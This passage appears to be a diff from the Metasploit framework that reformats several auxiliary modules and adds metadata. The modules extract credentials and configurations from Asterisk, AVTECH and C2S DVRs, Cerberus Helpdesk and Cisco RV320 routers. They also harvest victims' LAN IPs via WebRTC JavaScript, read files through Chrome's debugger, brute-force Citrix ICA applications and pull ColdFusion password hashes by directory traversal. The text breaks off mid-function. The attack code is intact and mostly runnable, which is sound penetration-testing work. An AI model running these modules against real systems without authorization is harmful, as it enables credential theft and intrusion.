-                                      'Indent'  => 1,
+    cred_table = Rex::Text::Table.new 'Header' => 'Asterisk User Credentials',
+                                      'Indent' => 1,
                                      'Columns' => ['Username', 'Secret', 'Type']

    @users.each do |user|
-      cred_table << [ user['username'],
-                      user['password'],
-                      user['type'] ]
-      report_cred user:     user['username'],
+      cred_table << [
+        user['username'],
+        user['password'],
+        user['type']
+      ]
+      report_cred user: user['username'],
                  password: user['password'],
-                  proof:    "#{user['type']} show users"
+                  proof: "#{user['type']} show users"
    end

    print_line
@@ -100,25 +110,25 @@ class MetasploitModule < Msf::Auxiliary

  def report_cred(opts)
    service_data = {
-      address:      rhost,
-      port:         rport,
+      address: rhost,
+      port: rport,
      service_name: 'asterisk_manager',
-      protocol:     'tcp',
+      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
-      origin_type:     :service,
+      origin_type: :service,
      module_fullname: fullname,
-      username:        opts[:user],
-      private_data:    opts[:password],
-      private_type:    :password
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
    }.merge service_data

    login_data = {
-      core:              create_credential(credential_data),
-      status:            Metasploit::Model::Login::Status::UNTRIED,
-      proof:             opts[:proof]
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
    }.merge service_data

    create_credential_login login_data
@@ -152,14 +162,14 @@ class MetasploitModule < Msf::Auxiliary

    return false unless res =~ /Response: Success/

-    report_cred user:     username,
+    report_cred user: username,
                password: password,
-                proof:    'Response: Success'
+                proof: 'Response: Success'

-    report_service :host  => rhost,
-                   :port  => rport,
+    report_service :host => rhost,
+                   :port => rport,
                   :proto => 'tcp',
-                   :name  => 'asterisk'
+                   :name => 'asterisk'
    true
  end

@@ -8,21 +8,28 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'AVTECH 744 DVR Account Information Retrieval',
-      'Description'    => %q{
-        This module will extract the account information from the AVTECH 744 DVR devices,
-        including usernames, cleartext passwords, and the device PIN, along with
-        a few other miscellaneous details. In order to extract the information, hardcoded
-        credentials admin/admin are used. These credentials can't be changed from the device
-        console UI nor from the web UI.
-      },
-      'Author'         => [ 'nstarke' ],
-      'License'        => MSF_LICENSE
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'AVTECH 744 DVR Account Information Retrieval',
+        'Description' => %q{
+          This module will extract the account information from the AVTECH 744 DVR devices,
+          including usernames, cleartext passwords, and the device PIN, along with
+          a few other miscellaneous details. In order to extract the information, hardcoded
+          credentials admin/admin are used. These credentials can't be changed from the device
+          console UI nor from the web UI.
+        },
+        'Author' => [ 'nstarke' ],
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
  end

-
  def run
    res = send_request_cgi({
      'method' => 'POST',
@@ -6,28 +6,35 @@
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::BrowserExploitServer

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "HTTP Client Information Gather",
-      'Description'    => %q{
-        This module gathers information about a browser that exploits might be interested in, such
-        as OS name, browser version, plugins, etc. By default, the module will return a fake 404,
-        but you can customize this output by changing the Custom404 datastore option, and
-        redirect to an external web page.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'sinn3r' ],
-      'DisclosureDate' => '2016-03-22',
-      'Actions'     =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "HTTP Client Information Gather",
+        'Description' => %q{
+          This module gathers information about a browser that exploits might be interested in, such
+          as OS name, browser version, plugins, etc. By default, the module will return a fake 404,
+          but you can customize this output by changing the Custom404 datastore option, and
+          redirect to an external web page.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'sinn3r' ],
+        'DisclosureDate' => '2016-03-22',
+        'Actions' => [
          [
            'WebServer',
-              'Description' => 'A web server that collects information about the browser.'
+            'Description' => 'A web server that collects information about the browser.'
          ]
        ],
-      'PassiveActions' => [ 'WebServer' ],
-      'DefaultAction'  => 'WebServer'
-    ))
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
  end

  def is_key_wanted?(key)
@@ -10,25 +10,30 @@ class MetasploitModule < Msf::Auxiliary
    super(
      update_info(
        info,
-        'Name'           => 'HTTP Client LAN IP Address Gather',
-        'Description'    => %q(
+        'Name' => 'HTTP Client LAN IP Address Gather',
+        'Description' => %q{
          This module retrieves a browser's network interface IP addresses
          using WebRTC.
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         => [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'Daniel Roesler', # JS Code
          'Dhiraj Mishra'   # MSF Module
-         ],
-        'References'     => [
-           [ 'CVE', '2018-6849' ],
-           [ 'URL', 'http://net.ipcalf.com/' ],
-           [ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ]
-         ],
+        ],
+        'References' => [
+          [ 'CVE', '2018-6849' ],
+          [ 'URL', 'http://net.ipcalf.com/' ],
+          [ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ]
+        ],
        'DisclosureDate' => '2013-09-05',
-        'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
        'PassiveActions' => [ 'WebServer' ],
-        'DefaultAction'  => 'WebServer'
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
      )
    )
  end
@@ -38,94 +43,94 @@ class MetasploitModule < Msf::Auxiliary
  end

  def setup
-     # code from: https://github.com/diafygi/webrtc-ips
-     @html = <<-JS
-<script>
-//get the IP addresses associated with an account
-function getIPs(callback){
-    var ip_dups = {};
+    # code from: https://github.com/diafygi/webrtc-ips
+    @html = <<~JS
+      <script>
+      //get the IP addresses associated with an account
+      function getIPs(callback){
+          var ip_dups = {};

-    //compatibility for firefox and chrome
-    var RTCPeerConnection = window.RTCPeerConnection
-        || window.mozRTCPeerConnection
-        || window.webkitRTCPeerConnection;
-    var useWebKit = !!window.webkitRTCPeerConnection;
+          //compatibility for firefox and chrome
+          var RTCPeerConnection = window.RTCPeerConnection
+              || window.mozRTCPeerConnection
+              || window.webkitRTCPeerConnection;
+          var useWebKit = !!window.webkitRTCPeerConnection;

-    //bypass naive webrtc blocking using an iframe
-    if(!RTCPeerConnection){
-        //NOTE: you need to have an iframe in the page right above the script tag
-        //
-        //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
-        //<script>...getIPs called in here...
-        //
-        var win = iframe.contentWindow;
-        RTCPeerConnection = win.RTCPeerConnection
-            || win.mozRTCPeerConnection
-            || win.webkitRTCPeerConnection;
-        useWebKit = !!win.webkitRTCPeerConnection;
-    }
+          //bypass naive webrtc blocking using an iframe
+          if(!RTCPeerConnection){
+              //NOTE: you need to have an iframe in the page right above the script tag
+              //
+              //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
+              //<script>...getIPs called in here...
+              //
+              var win = iframe.contentWindow;
+              RTCPeerConnection = win.RTCPeerConnection
+                  || win.mozRTCPeerConnection
+                  || win.webkitRTCPeerConnection;
+              useWebKit = !!win.webkitRTCPeerConnection;
+          }

-    //minimal requirements for data connection
-    var mediaConstraints = {
-        optional: [{RtpDataChannels: true}]
-    };
+          //minimal requirements for data connection
+          var mediaConstraints = {
+              optional: [{RtpDataChannels: true}]
+          };

-    var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
+          var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

-    //construct a new RTCPeerConnection
-    var pc = new RTCPeerConnection(servers, mediaConstraints);
+          //construct a new RTCPeerConnection
+          var pc = new RTCPeerConnection(servers, mediaConstraints);

-    function handleCandidate(candidate){
-        //match just the IP address
-        var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
-        var ip_addr = ip_regex.exec(candidate)[1];
+          function handleCandidate(candidate){
+              //match just the IP address
+              var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
+              var ip_addr = ip_regex.exec(candidate)[1];

-        //remove duplicates
-        if(ip_dups[ip_addr] === undefined)
-            callback(ip_addr);
+              //remove duplicates
+              if(ip_dups[ip_addr] === undefined)
+                  callback(ip_addr);

-        ip_dups[ip_addr] = true;
-    }
+              ip_dups[ip_addr] = true;
+          }

-    //listen for candidate events
-    pc.onicecandidate = function(ice){
+          //listen for candidate events
+          pc.onicecandidate = function(ice){

-        //skip non-candidate events
-        if(ice.candidate)
-            handleCandidate(ice.candidate.candidate);
-    };
+              //skip non-candidate events
+              if(ice.candidate)
+                  handleCandidate(ice.candidate.candidate);
+          };

-    //create a bogus data channel
-    pc.createDataChannel("");
+          //create a bogus data channel
+          pc.createDataChannel("");

-    //create an offer sdp
-    pc.createOffer(function(result){
+          //create an offer sdp
+          pc.createOffer(function(result){

-        //trigger the stun server request
-        pc.setLocalDescription(result, function(){}, function(){});
+              //trigger the stun server request
+              pc.setLocalDescription(result, function(){}, function(){});

-    }, function(){});
+          }, function(){});

-    //wait for a while to let everything done
-    setTimeout(function(){
-        //read candidate info from local description
-        var lines = pc.localDescription.sdp.split('\\n');
+          //wait for a while to let everything done
+          setTimeout(function(){
+              //read candidate info from local description
+              var lines = pc.localDescription.sdp.split('\\n');

-        lines.forEach(function(line){
-            if(line.indexOf('a=candidate:') === 0)
-                handleCandidate(line);
-        });
-    }, 1000);
-}
+              lines.forEach(function(line){
+                  if(line.indexOf('a=candidate:') === 0)
+                      handleCandidate(line);
+              });
+          }, 1000);
+      }

-getIPs(function(ip){
-  //console.log(ip);
-  var xmlhttp = new XMLHttpRequest;
-  xmlhttp.open('POST', window.location, true);
-  xmlhttp.send(ip);
-});
-</script>
-     JS
+      getIPs(function(ip){
+        //console.log(ip);
+        var xmlhttp = new XMLHttpRequest;
+        xmlhttp.open('POST', window.location, true);
+        xmlhttp.send(ip);
+      });
+      </script>
+    JS
  end

  def on_request_uri(cli, request)
@@ -10,19 +10,18 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'         => 'C2S DVR Management Password Disclosure',
-      'Description'  => %q{
+      'Name' => 'C2S DVR Management Password Disclosure',
+      'Description' => %q{
        C2S DVR allows an unauthenticated user to disclose the username
        & password by requesting the javascript page 'read.cgi?page=2'.
        This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
      },
-      'References'   => [['EDB', '40265']],
-      'Author'       =>
-        [
-          'Yakir Wizman', # discovery
-          'h00die',    # module
-        ],
-      'License'      => MSF_LICENSE,
+      'References' => [['EDB', '40265']],
+      'Author' => [
+        'Yakir Wizman', # discovery
+        'h00die', # module
+      ],
+      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Aug 19 2016'
    )

@@ -36,8 +35,8 @@ class MetasploitModule < Msf::Auxiliary
      url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'read.cgi')
      vprint_status("Attempting to load data from #{url}?page=2")
      res = send_request_cgi({
-        'uri'      => url,
-        'vars_get' => {'page'=>'2'}
+        'uri' => url,
+        'vars_get' => { 'page' => '2' }
      })
      unless res
        print_error("#{peer} Unable to connect to #{url}")
@@ -52,8 +51,8 @@ class MetasploitModule < Msf::Auxiliary
      if res.body =~ /pw_adminpw = "(.+?)";/
        print_good("Found: admin:#{$1}")
        store_valid_credential(
-          user:         'admin',
-          private:      $1,
+          user: 'admin',
+          private: $1,
          private_type: :password
        )
      end
@@ -61,8 +60,8 @@ class MetasploitModule < Msf::Auxiliary
      if res.body =~ /pw_userpw = "(.+?)";/
        print_good("Found: user:#{$1}")
        store_valid_credential(
-          user:         'user',
-          private:      $1,
+          user: 'user',
+          private: $1,
          private_type: :password
        )
      end
@@ -10,29 +10,28 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'         => 'Cerberus Helpdesk User Hash Disclosure',
-      'Description'  => %q{
+      'Name' => 'Cerberus Helpdesk User Hash Disclosure',
+      'Description' => %q{
        This module extracts usernames and password hashes from the Cerberus Helpdesk
        through an unauthenticated access to a workers file.
        Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
        },
-      'References'   =>
-        [
-          [ 'EDB', '39526' ]
-        ],
-      'Author'       =>
-        [
-          'asdizzle_', # discovery
-          'h00die',    # module
-        ],
-      'License'      => MSF_LICENSE,
+      'References' => [
+        [ 'EDB', '39526' ]
+      ],
+      'Author' => [
+        'asdizzle_', # discovery
+        'h00die', # module
+      ],
+      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Mar 7 2016'
    )

    register_options(
      [
        OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
-      ])
+      ]
+    )
  end

  def run_host(rhost)
@@ -40,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
      ['devblocks', 'zend'].each do |site|
        url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
        vprint_status("Attempting to load data from #{url}")
-        res = send_request_cgi({'uri' => url})
+        res = send_request_cgi({ 'uri' => url })
        if !res
          print_error("#{peer} Unable to connect to #{url}")
          next
@@ -51,8 +50,8 @@ class MetasploitModule < Msf::Auxiliary
          next
        end

-        cred_table = Rex::Text::Table.new 'Header'  => 'Cerberus Helpdesk User Credentials',
-                                          'Indent'  => 1,
+        cred_table = Rex::Text::Table.new 'Header' => 'Cerberus Helpdesk User Credentials',
+                                          'Indent' => 1,
                                          'Columns' => ['Username', 'Password Hash']

        # the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
@@ -66,8 +65,8 @@ class MetasploitModule < Msf::Auxiliary
            password_hash = cred[7].tr('";', '') # remove extra characters
            print_good("Found: #{username}:#{password_hash}")
            store_valid_credential(
-              user:         username,
-              private:      password_hash,
+              user: username,
+              private: password_hash,
              private_type: :nonreplayable_hash
            )
            cred_table << [username, password_hash]
@@ -77,7 +76,6 @@ class MetasploitModule < Msf::Auxiliary
        print_line cred_table.to_s
        break
      end
-
    rescue ::Rex::ConnectionError
      print_error("#{peer} Unable to connect to site")
      return
@@ -8,33 +8,41 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
-      'Description'    => %q{
-        This module sends a query to the port 264/TCP on CheckPoint Firewall-1
-        firewalls to obtain the firewall name and management station
-        (such as SmartCenter) name via a pre-authentication request. The string
-        returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
-        host. Whilst considered "public" information, the majority of installations
-        use detailed hostnames which may aid an attacker in focusing on compromising
-        the SmartCenter host, or useful for government, intelligence and military
-        networks where the hostname reveals the physical location and rack number
-        of the device, which may be unintentionally published to the world.
-      },
-      'Author'         => [ 'aushack' ],
-      'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
+        'Description' => %q{
+          This module sends a query to the port 264/TCP on CheckPoint Firewall-1
+          firewalls to obtain the firewall name and management station
+          (such as SmartCenter) name via a pre-authentication request. The string
+          returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
+          host. Whilst considered "public" information, the majority of installations
+          use detailed hostnames which may aid an attacker in focusing on compromising
+          the SmartCenter host, or useful for government, intelligence and military
+          networks where the hostname reveals the physical location and rack number
+          of the device, which may be unintentionally published to the world.
+        },
+        'Author' => [ 'aushack' ],
+        'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
+        'References' => [
          # aushack - None? Stumbled across, probably an old bug/feature but unsure.
          [ 'URL', 'https://web.archive.org/web/20120508142715/http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],
          [ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(264),
-      ])
+      ]
+    )
  end

  def autofilter
@@ -65,15 +73,16 @@ class MetasploitModule < Msf::Auxiliary
      print_error("Unexpected response: '#{res.inspect}'")
    end

-    report_info(fw_hostname,sc_hostname)
+    report_info(fw_hostname, sc_hostname)

    disconnect
  end

  # Only trust that it's real if we have a hostname. If you get a funny
  # response, it might not be what we think it is.
-  def report_info(fw_hostname,sc_hostname)
+  def report_info(fw_hostname, sc_hostname)
    return unless fw_hostname
+
    host_info = {
      :host => datastore['RHOST'],
      :os_name => "Checkpoint Firewall-1",
@@ -10,20 +10,28 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
-      'Description' => %q{
-        This module uses the Chrome Debugger's API to read
-        files off the remote file system, or to make web requests
-        from a remote machine.  Useful for cloud metadata endpoints!
-      },
-      'Author' => [
-        'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
-        'Nicholas Starke (The King Pig Demon)' # msf module
-      ],
-      'DisclosureDate' => '2019-09-24',
-      'License' => MSF_LICENSE
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
+        'Description' => %q{
+          This module uses the Chrome Debugger's API to read
+          files off the remote file system, or to make web requests
+          from a remote machine.  Useful for cloud metadata endpoints!
+        },
+        'Author' => [
+          'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
+          'Nicholas Starke (The King Pig Demon)' # msf module
+        ],
+        'DisclosureDate' => '2019-09-24',
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -86,7 +94,7 @@ class MetasploitModule < Msf::Auxiliary
            'id' => id,
            'method' => 'Page.navigate',
            'params' => {
-              url:  fetch_uri
+              url: fetch_uri
            }
          }.to_json)
        end
@@ -7,9 +7,11 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Cisco RV320/RV326 Configuration Disclosure',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco RV320/RV326 Configuration Disclosure',
+        'Description' => %q{
          A vulnerability in the web-based management interface of Cisco Small Business
          RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,
          remote attacker to retrieve sensitive information. The vulnerability is due
@@ -19,14 +21,12 @@ class MetasploitModule < Msf::Auxiliary
          download the router configuration or detailed diagnostic information. Cisco
          has released firmware updates that address this vulnerability.
        },
-      'Author'         =>
-        [
+        'Author' => [
          'RedTeam Pentesting GmbH <release@redteam-pentesting.de>',
          'Aaron Soto <asoto@rapid7.com>'
        ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
          ['EDB', '46262'],
          ['BID', '106732'],
          ['CVE', '2019-1653'],
@@ -34,18 +34,24 @@ class MetasploitModule < Msf::Auxiliary
          ['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'],
          ['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html']
        ],
-      'DisclosureDate' => '2019-01-24',
-      'DefaultOptions' =>
-        {
-          'SSL'   => true
+        'DisclosureDate' => '2019-01-24',
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
-    ))
+      )
+    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp']),
-      ])
+      ]
+    )
  end

  def report_cred(user, hash)
@@ -100,8 +106,8 @@ class MetasploitModule < Msf::Auxiliary
    begin
      uri = normalize_uri(target_uri.path)
      res = send_request_cgi({
-        'uri'     => uri,
-        'method'  => 'GET',
+        'uri' => uri,
+        'method' => 'GET',
      }, 60)
    rescue OpenSSL::SSL::SSLError
      fail_with(Failure::UnexpectedReply, 'SSL handshake failed.  Consider setting SSL to false and trying again.')
@@ -116,8 +122,8 @@ class MetasploitModule < Msf::Auxiliary
    body = res.body
    if body.match(/####sysconfig####/)
      parse_config(body)
-    else body.include?"meta http-equiv=refresh content='0; url=/default.htm'"
-      fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
+    else body.include? "meta http-equiv=refresh content='0; url=/default.htm'"
+         fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
    end
  end
 end
@@ -7,23 +7,31 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Citrix MetaFrame ICA Published Applications Scanner',
-      'Description'    => %q{
-        This module attempts to query Citrix Metaframe ICA server to obtain
-        a published list of applications.
-      },
-      'Author'         => [ 'aushack' ],
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Citrix MetaFrame ICA Published Applications Scanner',
+        'Description' => %q{
+          This module attempts to query Citrix Metaframe ICA server to obtain
+          a published list of applications.
+        },
+        'Author' => [ 'aushack' ],
+        'References' => [
          [ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ],
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(1604),
-      ])
+      ]
+    )
  end

  def autofilter
@@ -46,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
    udp_sock.put(client_connect)
    res = udp_sock.get(3)

-    if (res[0,server_response.length] == server_response)
+    if (res[0, server_response.length] == server_response)
      print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...")

      find_published =
@@ -62,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary
      res = udp_sock.get(3)

      if (res.index(server_list_pre) == 0) # good packet, with following data
-        print_status("Citrix Applications Reported:\r\n" + res[server_list_pre.length,res.length].gsub("\x00","\r\n"))
+        print_status("Citrix Applications Reported:\r\n" + res[server_list_pre.length, res.length].gsub("\x00", "\r\n"))
      end
    else
      print_error("Citrix did not report any Published Applications. Try the brute force module instead.")
@@ -7,24 +7,32 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Citrix MetaFrame ICA Published Applications Bruteforcer',
-      'Description'    => %q{
-        This module attempts to brute force program names within the Citrix
-        Metaframe ICA server.
-      },
-      'Author'         => [ 'aushack' ],
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Citrix MetaFrame ICA Published Applications Bruteforcer',
+        'Description' => %q{
+          This module attempts to brute force program names within the Citrix
+          Metaframe ICA server.
+        },
+        'Author' => [ 'aushack' ],
+        'References' => [
          [ 'OSVDB', '50617' ],
          [ 'BID', '5817' ]
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(1604),
-      ])
+      ]
+    )
  end

  def autofilter
@@ -142,11 +150,10 @@ class MetasploitModule < Msf::Auxiliary
    udp_sock.put(client_connect)
    res = udp_sock.get(3)

-    if (res[0,server_response.length] == server_response)
+    if (res[0, server_response.length] == server_response)
      print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")

      applications.each do |application|
-
        # Create the packet
        packet = [52 + application.length].pack('C')
        packet << "\x00\x02\x34\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00"
@@ -161,11 +168,11 @@ class MetasploitModule < Msf::Auxiliary
        udp_sock.put(packet)
        res = udp_sock.get(3)

-        if (res[0,application_valid.length] == application_valid)
+        if (res[0, application_valid.length] == application_valid)
          print_status("Found: #{application}")
        end

-        if (res[0,application_invalid.length] == application_invalid)
+        if (res[0, application_invalid.length] == application_invalid)
          print_error("NOT Found: #{application}")
        end
      end
@@ -8,43 +8,50 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => "ColdFusion 'password.properties' Hash Extraction",
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => "ColdFusion 'password.properties' Hash Extraction",
+        'Description' => %q{
          This module uses a directory traversal vulnerability to extract information
-        such as password, rdspassword, and "encrypted" properties. This module has been
-        tested successfully on ColdFusion 9 and ColdFusion 10 (auto-detect).
-      },
-      'References'     =>
-        [
+          such as password, rdspassword, and "encrypted" properties. This module has been
+          tested successfully on ColdFusion 9 and ColdFusion 10 (auto-detect).
+        },
+        'References' => [
          [ 'CVE', '2013-3336' ],
          [ 'OSVDB', '93114' ],
          [ 'EDB', '25305' ]
        ],
-      'Author'         =>
-        [
+        'Author' => [
          'HTP',
          'sinn3r',
          'nebulus'
        ],
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2013-05-07'  #The day we saw the subzero poc
-    ))
+        'License' => MSF_LICENSE,
+        # The day we saw the subzero poc
+        'DisclosureDate' => '2013-05-07',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new("TARGETURI", [true, 'Base path to ColdFusion', '/'])
-      ])
+      ]
+    )
  end

  def fingerprint(response)
-
-    if(response.headers.has_key?('Server') )
-      if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
+    if (response.headers.has_key?('Server'))
+      if (response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
        os = "Windows (#{response.headers['Server']})"
-      elsif(response.headers['Server'] =~ /Apache\//)
-          os = "Unix (#{response.headers['Server']})"
+      elsif (response.headers['Server'] =~ /Apache\//)
+        os = "Unix (#{response.headers['Server']})"
      else
        os = response.headers['Server']
      end
@@ -54,41 +61,41 @@ class MetasploitModule < Msf::Auxiliary

    title = "Not Found"
    response.body.gsub!(/[\r\n]/, '')
-    if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/i)
+    if (response.body =~ /<title.*\/?>(.+)<\/title\/?>/i)
      title = $1
      title.gsub!(/\s/, '')
    end
-    return nil  if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/)
+    return nil if (title == 'Not Found' or not title =~ /ColdFusionAdministrator/)

    out = nil

-    if(response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
+    if (response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
      v = $1
      out = (v =~ /^6/) ? "Adobe ColdFusion MX6 (Not Vulnerable)" : "Adobe ColdFusion MX7 (Not Vulnerable)"
-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ )
+    elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/)
      out = "Adobe ColdFusion MX7 (Not Vulnerable)"
-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
+    elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
      out = "Adobe ColdFusion 8 (Not Vulnerable)"
-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ and
+    elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ and
      response.body =~ /1997\-2012 Adobe Systems Incorporated and its licensors/)
      out = "Adobe ColdFusion 10"
-    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
+    elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
      response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/)
      out = "Adobe ColdFusion 9"
-    elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
+    elsif (response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
      out = $1.split(/,/)[0]
    else
      out = 'Unknown ColdFusion'
